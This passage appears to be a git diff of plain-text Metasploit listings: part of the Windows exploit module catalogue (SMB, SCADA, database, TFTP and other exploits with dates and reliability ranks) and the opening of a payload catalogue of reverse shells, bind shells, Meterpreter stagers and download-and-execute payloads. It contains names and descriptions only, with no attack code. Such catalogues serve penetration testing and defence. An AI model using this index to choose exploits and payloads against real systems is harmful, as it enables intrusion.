windows/misc/poppeeper_uidl 2009-02-27 normal No POP Peeper v3.4 UIDL Buffer Overflow + 1733 windows/misc/realtek_playlist 2008-12-16 great No Realtek Media Player Playlist Buffer Overflow + 1734 windows/misc/sap_2005_license 2009-08-01 great No SAP Business One License Manager 2005 Buffer Overflow + 1735 windows/misc/sap_netweaver_dispatcher 2012-05-08 normal No SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow + 1736 windows/misc/shixxnote_font 2004-10-04 great No ShixxNOTE 6.net Font Field Overflow + 1737 windows/misc/solidworks_workgroup_pdmwservice_file_write 2014-02-22 good Yes SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write + 1738 windows/misc/splayer_content_type 2011-05-04 normal No SPlayer 3.7 Content-Type Buffer Overflow + 1739 windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow + 1740 windows/misc/talkative_response 2009-03-17 normal No Talkative IRC v0.4.4.16 Response Buffer Overflow + 1741 windows/misc/tiny_identd_overflow 2007-05-14 average No TinyIdentD 2.2 Stack Buffer Overflow + 1742 windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow + 1743 windows/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow + 1744 windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector + 1745 windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server + 1746 windows/misc/windows_rsh 2007-07-24 average No Windows RSH Daemon Buffer Overflow + 1747 windows/misc/wireshark_lua 2011-07-18 excellent No Wireshark console.lua Pre-Loading Script Execution + 1748 windows/misc/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow + 1749 windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great No Windows Media Services ConnectFunnel Stack Buffer Overflow + 1750 windows/motorola/timbuktu_fileupload 2008-05-10 excellent No Timbuktu Pro Directory Traversal/File Upload + 1751 windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent No Lyris ListManager MSDE Weak sa Password + 1752 windows/mssql/ms02_039_slammer 2002-07-24 good Yes MS02-039 Microsoft SQL Server Resolution Overflow + 1753 windows/mssql/ms02_056_hello 2002-08-05 good Yes MS02-056 Microsoft SQL Server Hello Overflow + 1754 windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption + 1755 windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection + 1756 windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution + 1757 windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution + 1758 windows/mssql/mssql_payload 2000-05-30 excellent Yes Microsoft SQL Server Payload Execution + 1759 windows/mssql/mssql_payload_sqli 2000-05-30 excellent No Microsoft SQL Server Payload Execution via SQL Injection + 1760 windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution + 1761 windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse + 1762 windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow + 1763 windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential + 1764 windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow + 1765 windows/nntp/ms05_030_nntp 2005-06-14 normal No MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow + 1766 windows/novell/file_reporter_fsfui_upload 2012-11-16 great No NFR Agent FSFUI Record File Upload RCE + 1767 windows/novell/groupwisemessenger_client 2008-07-02 normal No Novell GroupWise Messenger Client Buffer Overflow + 1768 windows/novell/netiq_pum_eval 2012-11-15 excellent Yes NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution + 1769 windows/novell/nmap_stor 2006-12-23 average No Novell NetMail NMAP STOR Buffer Overflow + 1770 windows/novell/zenworks_desktop_agent 2005-05-19 good No Novell ZENworks 6.5 Desktop/Server Management Overflow + 1771 windows/novell/zenworks_preboot_op21_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow + 1772 windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow + 1773 windows/novell/zenworks_preboot_op6_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow + 1774 windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow + 1775 windows/nuuo/nuuo_cms_fu 2018-10-11 manual No Nuuo Central Management Server Authenticated Arbitrary File Upload + 1776 windows/nuuo/nuuo_cms_sqli 2018-10-11 normal No Nuuo Central Management Authenticated SQL Server SQLi + 1777 windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Yes Oracle Database Client System Analyzer Arbitrary File Upload + 1778 windows/oracle/extjob 2007-01-01 excellent Yes Oracle Job Scheduler Named Pipe Command Execution + 1779 windows/oracle/osb_ndmp_auth 2009-01-14 good No Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow + 1780 windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow + 1781 windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow + 1782 windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow + 1783 windows/pop3/seattlelab_pass 2003-05-07 great No Seattle Lab Mail 5.5 POP3 Buffer Overflow + 1784 windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution + 1785 windows/proxy/bluecoat_winproxy_host 2005-01-05 great No Blue Coat WinProxy Host Header Overflow + 1786 windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow + 1787 windows/proxy/proxypro_http_get 2004-02-23 great No Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow + 1788 windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Yes Qbik WinGate WWW Proxy Server URL Processing Overflow + 1789 windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution + 1790 windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload + 1791 windows/scada/advantech_webaccess_webvrpcs_bof 2017-11-02 good No Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow + 1792 windows/scada/citect_scada_odbc 2008-06-11 normal No CitectSCADA/CitectFacilities ODBC Buffer Overflow + 1793 windows/scada/codesys_gateway_server_traversal 2013-02-02 excellent No SCADA 3S CoDeSys Gateway Server Directory Traversal + 1794 windows/scada/codesys_web_server 2011-12-02 normal Yes SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow + 1795 windows/scada/daq_factory_bof 2011-09-13 good No DaqFactory HMI NETB Request Overflow + 1796 windows/scada/delta_ia_commgr_bof 2018-07-02 normal No Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow + 1797 windows/scada/factorylink_csservice 2011-03-25 normal No Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow + 1798 windows/scada/factorylink_vrn_09 2011-03-21 average No Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow + 1799 windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution + 1800 windows/scada/iconics_genbroker 2011-03-21 good No Iconics GENESIS32 Integer Overflow Version 9.21.201.01 + 1801 windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good No ICONICS WebHMI ActiveX Buffer Overflow + 1802 windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow + 1803 windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow + 1804 windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities + 1805 windows/scada/igss_exec_17 2011-03-21 excellent No Interactive Graphical SCADA System Remote Command Injection + 1806 windows/scada/indusoft_webstudio_exec 2011-11-04 excellent Yes InduSoft Web Studio Arbitrary Upload Remote Code Execution + 1807 windows/scada/moxa_mdmtool 2010-10-20 great No MOXA Device Manager Tool 2.1 Buffer Overflow + 1808 windows/scada/procyon_core_server 2011-09-08 normal Yes Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow + 1809 windows/scada/realwin 2008-09-26 great No DATAC RealWin SCADA Server Buffer Overflow + 1810 windows/scada/realwin_on_fc_binfile_a 2011-03-21 great No DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow + 1811 windows/scada/realwin_on_fcs_login 2011-03-21 great No RealWin SCADA Server DATAC Login Buffer Overflow + 1812 windows/scada/realwin_scpc_initialize 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow + 1813 windows/scada/realwin_scpc_initialize_rf 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow + 1814 windows/scada/realwin_scpc_txtevent 2010-11-18 great No DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow + 1815 windows/scada/scadapro_cmdexe 2011-09-16 excellent No Measuresoft ScadaPro Remote Command Execution + 1816 windows/scada/sunway_force_control_netdbsrv 2011-09-22 great No Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 + 1817 windows/scada/winlog_runtime 2011-01-13 great No Sielco Sistemi Winlog Buffer Overflow + 1818 windows/scada/winlog_runtime_2 2012-06-04 normal No Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 + 1819 windows/scada/yokogawa_bkbcopyd_bof 2014-03-10 normal Yes Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow + 1820 windows/scada/yokogawa_bkesimmgr_bof 2014-03-10 normal Yes Yokogawa CS3000 BKESimmgr.exe Buffer Overflow + 1821 windows/scada/yokogawa_bkfsim_vhfd 2014-05-23 normal No Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow + 1822 windows/scada/yokogawa_bkhodeq_bof 2014-03-10 average Yes Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow + 1823 windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow + 1824 windows/sip/sipxezphone_cseq 2006-07-10 great No SIPfoundry sipXezPhone 0.35a CSeq Field Overflow + 1825 windows/sip/sipxphone_cseq 2006-07-10 great No SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow + 1826 windows/smb/generic_smb_dll_injection 2015-03-04 manual No Generic DLL Injection From Shared Resource + 1827 windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource + 1828 windows/smb/ipass_pipe_exec 2015-01-21 excellent Yes IPass Control Pipe Remote Command Execution + 1829 windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow + 1830 windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow + 1831 windows/smb/ms04_011_lsass 2004-04-13 good No MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow + 1832 windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow + 1833 windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow + 1834 windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow + 1835 windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow + 1836 windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow + 1837 windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit + 1838 windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit + 1839 windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow + 1840 windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) + 1841 windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption + 1842 windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference + 1843 windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution + 1844 windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability + 1845 windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution + 1846 windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption + 1847 windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ + 1848 windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution + 1849 windows/smb/netidentity_xtierrpcpipe 2009-04-06 great No Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow + 1850 windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution + 1851 windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution + 1852 windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery + 1853 windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution + 1854 windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow + 1855 windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution + 1856 windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good Yes TABS MailCarrier v2.51 SMTP EHLO Overflow + 1857 windows/smtp/mercury_cram_md5 2007-08-18 great No Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow + 1858 windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good Yes MS03-046 Exchange 2000 XEXCH50 Heap Overflow + 1859 windows/smtp/njstar_smtp_bof 2011-10-31 normal Yes NJStar Communicator 3.00 MiniSMTP Buffer Overflow + 1860 windows/smtp/sysgauge_client_bof 2017-02-28 normal No SysGauge SMTP Validation Buffer Overflow + 1861 windows/smtp/wmailserver 2005-07-11 average No SoftiaCom WMailserver 1.0 Buffer Overflow + 1862 windows/smtp/ypops_overflow1 2004-09-27 average Yes YPOPS 0.6 Buffer Overflow + 1863 windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow + 1864 windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass + 1865 windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow + 1866 windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow + 1867 windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow + 1868 windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow + 1869 windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow + 1870 windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow + 1871 windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow + 1872 windows/tftp/attftp_long_filename 2006-11-27 average No Allied Telesyn TFTP Server 1.9 Long Filename Overflow + 1873 windows/tftp/distinct_tftp_traversal 2012-04-08 excellent No Distinct TFTP 3.10 Writable Directory Traversal Execution + 1874 windows/tftp/dlink_long_filename 2007-03-12 good No D-Link TFTP 1.0 Long Filename Buffer Overflow + 1875 windows/tftp/futuresoft_transfermode 2005-05-31 average No FutureSoft TFTP Server 2000 Transfer-Mode Overflow + 1876 windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution + 1877 windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow + 1878 windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow + 1879 windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow + 1880 windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow + 1881 windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow + 1882 windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow + 1883 windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) + 1884 windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow + 1885 windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow + 1886 windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow + 1887 windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow + 1888 windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow + 1889 windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution + 1890 windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite + diff --git a/tools/payloads.txt b/tools/payloads.txt new file mode 100644 index 0000000..455fc21 --- /dev/null +++ b/tools/payloads.txt @@ -0,0 +1,553 @@ +Payloads +======== + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 1 aix/ppc/shell_bind_tcp normal No AIX Command Shell, Bind TCP Inline + 2 aix/ppc/shell_find_port normal No AIX Command Shell, Find Port Inline + 3 aix/ppc/shell_interact normal No AIX execve Shell for inetd + 4 aix/ppc/shell_reverse_tcp normal No AIX Command Shell, Reverse TCP Inline + 5 android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager + 6 android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager + 7 android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager + 8 android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline + 9 android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline + 10 android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline + 11 android/shell/reverse_http normal No Command Shell, Android Reverse HTTP Stager + 12 android/shell/reverse_https normal No Command Shell, Android Reverse HTTPS Stager + 13 android/shell/reverse_tcp normal No Command Shell, Android Reverse TCP Stager + 14 apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline + 15 apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline + 16 apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline + 17 apple_ios/aarch64/shell_reverse_tcp normal No Apple iOS aarch64 Command Shell, Reverse TCP Inline + 18 apple_ios/armle/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline + 19 apple_ios/armle/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline + 20 apple_ios/armle/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline + 21 bsd/sparc/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline + 22 bsd/sparc/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + 23 bsd/vax/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + 24 bsd/x64/exec normal No BSD x64 Execute Command + 25 bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6) + 26 bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP + 27 bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline + 28 bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6) + 29 bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP + 30 bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline + 31 bsd/x86/exec normal No BSD Execute Command + 32 bsd/x86/metsvc_bind_tcp normal No FreeBSD Meterpreter Service, Bind TCP + 33 bsd/x86/metsvc_reverse_tcp normal No FreeBSD Meterpreter Service, Reverse TCP Inline + 34 bsd/x86/shell/bind_ipv6_tcp normal No BSD Command Shell, Bind TCP Stager (IPv6) + 35 bsd/x86/shell/bind_tcp normal No BSD Command Shell, Bind TCP Stager + 36 bsd/x86/shell/find_tag normal No BSD Command Shell, Find Tag Stager + 37 bsd/x86/shell/reverse_ipv6_tcp normal No BSD Command Shell, Reverse TCP Stager (IPv6) + 38 bsd/x86/shell/reverse_tcp normal No BSD Command Shell, Reverse TCP Stager + 39 bsd/x86/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline + 40 bsd/x86/shell_bind_tcp_ipv6 normal No BSD Command Shell, Bind TCP Inline (IPv6) + 41 bsd/x86/shell_find_port normal No BSD Command Shell, Find Port Inline + 42 bsd/x86/shell_find_tag normal No BSD Command Shell, Find Tag Inline + 43 bsd/x86/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + 44 bsd/x86/shell_reverse_tcp_ipv6 normal No BSD Command Shell, Reverse TCP Inline (IPv6) + 45 bsdi/x86/shell/bind_tcp normal No BSDi Command Shell, Bind TCP Stager + 46 bsdi/x86/shell/reverse_tcp normal No BSDi Command Shell, Reverse TCP Stager + 47 bsdi/x86/shell_bind_tcp normal No BSDi Command Shell, Bind TCP Inline + 48 bsdi/x86/shell_find_port normal No BSDi Command Shell, Find Port Inline + 49 bsdi/x86/shell_reverse_tcp normal No BSDi Command Shell, Reverse TCP Inline + 50 cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges + 51 cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP + 52 cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits + 53 cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP + 54 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) + 55 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) + 56 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) + 57 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) + 58 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) + 59 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) + 60 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 + 61 cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs) + 62 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) + 63 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 + 64 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) + 65 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) + 66 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 + 67 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) + 68 cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub) + 69 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) + 70 cmd/unix/generic normal No Unix Command, Generic Command Execution + 71 cmd/unix/interact normal No Unix Command, Interact with Established Connection + 72 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) + 73 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) + 74 cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp) + 75 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) + 76 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) + 77 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) + 78 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) + 79 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) + 80 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) + 81 cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs) + 82 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) + 83 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) + 84 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) + 85 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) + 86 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) + 87 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) + 88 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) + 89 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) + 90 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) + 91 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) + 92 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) + 93 cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub) + 94 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh) + 95 cmd/windows/adduser normal No Windows Execute net user /ADD CMD + 96 cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua) + 97 cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) + 98 cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 + 99 cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby) + 100 cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS + 101 cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs) + 102 cmd/windows/generic normal No Windows Command, Generic Command Execution + 103 cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + 104 cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + 105 cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua) + 106 cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl) + 107 cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell) + 108 cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby) + 109 firefox/exec normal No Firefox XPCOM Execute Command + 110 firefox/shell_bind_tcp normal No Command Shell, Bind TCP (via Firefox XPCOM script) + 111 firefox/shell_reverse_tcp normal No Command Shell, Reverse TCP (via Firefox XPCOM script) + 112 generic/custom normal No Custom Payload + 113 generic/debug_trap normal No Generic x86 Debug Trap + 114 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline + 115 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline + 116 generic/tight_loop normal No Generic x86 Tight Loop + 117 java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline + 118 java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline + 119 java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager + 120 java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager + 121 java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager + 122 java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager + 123 java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager + 124 java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager + 125 java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline + 126 linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 127 